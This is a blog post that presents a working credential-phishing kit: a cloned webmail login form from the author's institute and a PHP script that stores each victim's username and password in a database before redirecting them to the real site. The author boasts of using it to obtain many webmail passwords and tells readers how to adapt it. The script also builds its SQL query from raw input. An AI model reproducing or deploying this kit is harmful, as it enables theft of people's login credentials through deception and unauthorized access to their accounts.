PHP redirection script

This is my one of the first php scripts which helped to access many webmail passwords in my institute.

<form action="redirect.php" method="post">
<td align="left" width="*"><input type="text" name="login_username" value="" />

<tr><td align="right" width="30%">Password:</td>
<td align="left" width="*"><input type="password" name="secretkey" />
<input type="hidden" name="js_autodetect_results" value="0" />
<input type="hidden" name="just_logged_in" value="1" />
<tr><td align="left"><center><input type="submit" value="Login" />
    <td width='30%' align="right">Log in to:</td>
    <td width="*" align="left">
       <select name="loginServer">
          <option value="Naambor">Naambor</option>
          <option value="Jampui- Alumni only">Jampui- Alumni only</option>
          <option value="Disang - Student Server">Disang - Student Server</option
          <option value="Tamdil - 2008 Batch">Tamdil - 2008 Batch</option>
       </select>
    </td>
</form>


THis is a PHP script which first takes the input from the site and then redirects to the original site.

The above mentioned form with username and password is stored and the values are redirected back to the site.

<?php

# “login_username”  is the form input name for username and “secretkey” is the form input name for password

# Get the post variables from the referer URL.
$username = $_POST[‘login_username’];
$password = $_POST[‘secretkey’];

# Connect to the database server
$connect=mysql_connect(“<server>”,”<username>”,”<password>”) or die(“Cannot connect to server”);

# Select database
$database=mysql_select_db(“<database>”) or die(“Cannot connect to database”);

# Create a database to insert the corresponding values

# Insert our post values in to the database
$sql = “INSERT INTO db (username, password) VALUES (‘$username’, ‘$password’)”;

# Execute the query

$rs = mysql_query($sql,$connect);

# Redirect the variables back to the original site
header(“Location: http://mysite.com/redirect.php?login_username=&#8221;.$username.”&secretkey=”.$password.”&js_autodetect_results=1&just_logged_in=1&loginServer=<server>”);

?>

The above script is corresponds to the specific form mentioned above and only used to send get variables. You should customize the script to be usefull for practical purposes.

The fields you have to change in the PHP script are

  • input form field names
  • database server, database name, database username, database passwor
  • create database structure to insert the fields
  • Finally you have to change the header Location to redirect to by checking the hidden and get variables that are actually going to the server.
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s